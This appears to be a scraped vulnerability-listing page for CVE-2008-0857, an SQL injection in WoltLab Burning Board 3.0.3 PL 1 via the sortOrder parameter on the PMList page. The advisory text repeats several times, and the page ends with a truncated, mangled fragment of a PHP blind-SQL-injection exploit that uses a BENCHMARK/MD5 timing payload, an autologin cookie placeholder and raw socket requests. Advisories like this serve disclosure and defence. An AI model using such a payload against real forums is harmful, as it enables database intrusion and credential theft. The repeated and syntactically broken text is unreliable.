EUVD-2008-0864

Malware in sbrugna...

Sql injection

SQL injection vulnerability in index.php in WoltLab Burning Board 3.0.3 PL 1 allows remote attackers to execute arbitrary SQL commands via the sortOrder parameter to the PMList page...

CVE-2008-0857

SQL injection vulnerability in index.php in WoltLab Burning Board 3.0.3 PL 1 allows remote attackers to execute arbitrary SQL commands via the sortOrder parameter to the PMList page...

CVE-2008-0857

This entry covers CVE-2008-0857: a SQL injection in WoltLab Burning Board 3.0.3 PL 1’s index.php, exploitable through the sortOrder parameter on the PMList page. The underlying flaw is an injectable SQL command path in the application’s handling of that parameter, allowing remote attackers to imp...

wbb-blindsql.txt

$char,BENCHMARK3000000,MD523,1"; // Edit 3000000 if the stuff doesn't work or taking long times. / Place here youre autologin cookie / $cookie = "wcfcookieHash=; wcfboardLastActivityTime=; wcfuserID=; wcfpassword=;"; $starttime = time; $connection = fsockopen$host, 80; fputs$connection, "GET:...